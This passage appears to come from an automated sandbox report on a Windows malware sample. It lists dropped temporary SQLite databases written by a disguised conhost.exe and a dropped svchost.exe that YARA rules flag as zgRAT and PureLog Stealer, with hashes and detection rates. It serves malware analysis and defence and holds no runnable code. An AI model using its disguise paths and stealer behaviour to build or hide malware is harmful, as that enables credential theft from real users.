                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\p8dfP89Eqx

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\pGs1MDRVYz

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\pjW976mdgs

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\psvsWE0Pyu

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\pwBP4xtbEe

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\q9BeTagoKR

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\qQ2lkg6djB

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\qQgl6qH9I2

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\qZ8g3iO1Sz

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\qexFrRmODw

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\qfnbNOzX4A

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\qs5FL9Yii3

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\rbps293mSf

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\rcBJxo3cbc

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\rcdCKsYyfx

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\sKznzmWELT

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\sL0GQhUBHe

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\sQg2vF3n7W

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):98304
                                                          Entropy (8bit):0.08235737944063153
                                                          Encrypted:false
                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\sVy9l92p5W

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\saMGhM4Fpv

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\suK33mj6ya

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\svchost.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Zn0uX5K1ez.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2238090
                                                          Entropy (8bit):7.47686437883303
                                                          Encrypted:false
                                                          SSDEEP:24576:2TbBv5rUyXVQulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVtB:IBJbPtx5dxKo+LbxqqfnWucVpbJ8y1Gc
                                                          MD5:A87CB2A1E23600C28C1A8E6A5C6A1C52
                                                          SHA1:8D8DABCCA9B1265A12B4E5A00D517930305468B6
                                                          SHA-256:1BA3C880A6C5D379E7257E3BB14F9AA6B2D836562E5AD0439F219FA76B3D9DCA
                                                          SHA-512:23A9132C0EAF6725E42A974C656A8CB5792A67F7EB7E32D33041FB72F45780F97ECFB6822C8099BD7F425FB142DFA6E0E3DBD46B1736D70551C32EB910DBD280
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 59%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\t6y0dZWVbR

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
